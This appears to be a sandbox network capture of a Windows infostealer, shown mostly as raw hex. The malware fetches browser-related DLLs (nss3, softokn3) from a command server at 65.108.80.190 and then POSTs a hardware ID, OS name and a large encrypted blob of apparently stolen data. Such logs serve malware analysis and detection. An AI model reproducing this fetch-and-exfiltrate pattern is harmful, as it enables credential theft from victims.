eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Oct 16, 2021 16:53:24.448883057 CEST	1466	OUT	GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 65.108.80.190 Connection: Keep-Alive
Oct 16, 2021 16:53:24.488419056 CEST	1484	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:24 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Sun, 17 Oct 2021 14:53:24 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Oct 16, 2021 16:53:25.182845116 CEST	2131	OUT	GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 65.108.80.190 Connection: Keep-Alive
Oct 16, 2021 16:53:25.222263098 CEST	2149	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:25 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Sun, 17 Oct 2021 14:53:25 GMT Cache-Control: max-age=86400 X-Cache-Status: HIT X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Oct 16, 2021 16:53:26.445132017 CEST	3546	OUT	GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 65.108.80.190 Connection: Keep-Alive
Oct 16, 2021 16:53:26.484885931 CEST	3547	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:26 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Sun, 17 Oct 2021 14:53:26 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Oct 16, 2021 16:53:27.012855053 CEST	3698	OUT	GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 65.108.80.190 Connection: Keep-Alive
Oct 16, 2021 16:53:27.052541971 CEST	3699	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:27 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Sun, 17 Oct 2021 14:53:27 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Oct 16, 2021 16:53:36.219660044 CEST	3888	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 85934 Host: 65.108.80.190 Connection: Keep-Alive Cache-Control: no-cache
Oct 16, 2021 16:53:36.219818115 CEST	3902	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
Oct 16, 2021 16:53:36.259212971 CEST	3912	OUT	Data Raw: f0 5c c6 0b cc ca 2e 0e 5a 54 0e c0 69 60 d7 0a a3 6f ba ca 3e bb f3 ee 42 1a 10 5d 62 83 59 3e fb 3c e4 44 c6 63 ec 7f 84 77 b8 ae 0f 24 ce ca 76 32 e5 7b cc f5 99 75 cf c6 12 f7 a3 3f 9a 3f 65 7b 4e b1 b9 c3 e1 35 f7 be 1b 6e f4 58 50 f4 20 b5 Data Ascii: \.ZTi`o>B]bY><Dcw$v2{u??e{N5nXP gq-)y19P`f[G5`{1#"'=>gQ(}*<1W.Sv}QY=I.9KKk=#!sp.fe%;9sot\3QVIq
Oct 16, 2021 16:53:36.259293079 CEST	3920	OUT	Data Raw: c2 25 ad 11 15 22 4d e3 03 3f fa b8 6a 90 ca 11 95 fd af 3c e0 bd b7 68 db 63 84 b2 4c ba f9 8b 51 9e 13 97 b1 55 89 5c a5 2d 65 83 bf 94 db cf 0d 13 3d 8b c3 9b 5d 96 b6 53 5f 1c 4c 6b 0a 7b e0 64 14 f8 75 12 28 42 ce 14 3e 73 7e 64 d8 c7 d9 d2 Data Ascii: %"M?j<hcLQU\-e=]S_Lk{du(B>s~d5\|Uz\|_3Ya.)gt5AWV-/.'fCczko2.r* :iyVL~+D}f&MMQdD`;.
Oct 16, 2021 16:53:36.259336948 CEST	3927	OUT	Data Raw: 87 b7 66 45 9b d9 23 e1 9d bf 74 e0 27 10 99 2a ce 06 89 df 1f 7c 30 c1 5d af bd 3d 06 c7 08 1e 4c ee 98 4e 47 5b c9 96 96 17 76 74 89 93 8d 7f 1f b1 92 75 0f cb 67 84 9c 38 9f 22 1f c7 cb 1f 87 d1 fa 22 5a 0d fe e4 ab 49 5a 8c 3a 5a 0b fe a9 89 Data Ascii: fE#t'\|0]=LNG[vtug8""ZIZ:ZRbTdmb-josWaR'zrdz58y"qJrCyIh{+f4U#{Dt~8'Stt# _\puqZ]e!t
Oct 16, 2021 16:53:36.259360075 CEST	3933	OUT	Data Raw: d7 06 be 4b 46 02 f8 f9 95 ba 2e 03 71 45 10 d9 fd 45 11 86 d4 c9 88 54 e9 7f ea 7f 21 4f 60 c0 1c db d4 af 24 66 89 d4 8b f2 38 27 b7 8a 7f 89 2f 2a a4 b0 cc 4b 8b f3 07 29 e6 50 74 37 ae 26 04 57 90 9a e7 83 f7 56 29 e4 83 57 83 66 8d 27 f6 4b Data Ascii: KF.qEET!O`$f8'/*K)Pt7&WV)Wf'K(]/epZ6r/z&t~wGSX/jF6L4Ob\|G6.~bB]/C%kwJn;OdN\1YIz3DAQ~_sH9@jb%1#AF}
Oct 16, 2021 16:53:36.298635960 CEST	3956	OUT	Data Raw: 7c 25 0c 2c 09 79 a2 98 c1 fe 97 ff 5b f6 0f e9 83 2a 11 16 2f 3d 09 9b dd 2c fc ea 83 7e 0a a3 da c7 49 89 9f 03 76 85 86 f4 df 8b 4d 74 17 28 ce 5e 3a a5 d2 e3 cd db 0f 43 74 89 de 25 f8 50 af fd 85 3d 78 51 72 4e 57 e0 4b 58 f1 4b 59 1b 54 43 Data Ascii: \|%,y[/=,~IvMt(^:Ct%P=xQrNWKXKYTC&:4-volP~=W#VO%Rk<lxx"X%$!=q/hlZ*\|P>E$/2!\|SGDOd!/
Oct 16, 2021 16:53:36.298719883 CEST	3973	OUT	Data Raw: 4c cc 69 3a f1 03 74 26 eb 71 25 1a dd 2f d3 09 9f 8c 04 64 89 9e a5 0e 00 0b fa ac 45 42 1a 0c 75 fa 3e b1 08 70 ad 00 3e b9 f4 40 e9 9d 76 74 c5 c9 28 00 f5 07 b8 a0 28 f6 5f 5e 0a 7a 29 76 7a b5 de 1e d1 26 5a 9f 16 b1 0b d8 32 12 df 83 8d 40 Data Ascii: Li:t&q%/dEBu>p>@vt((_^z)vz&Z2@{UF"N0]*1v7a %~lnmfw6[WhY^:V/}NfK<Wrol<tJ80\|h:qommA:FD#S
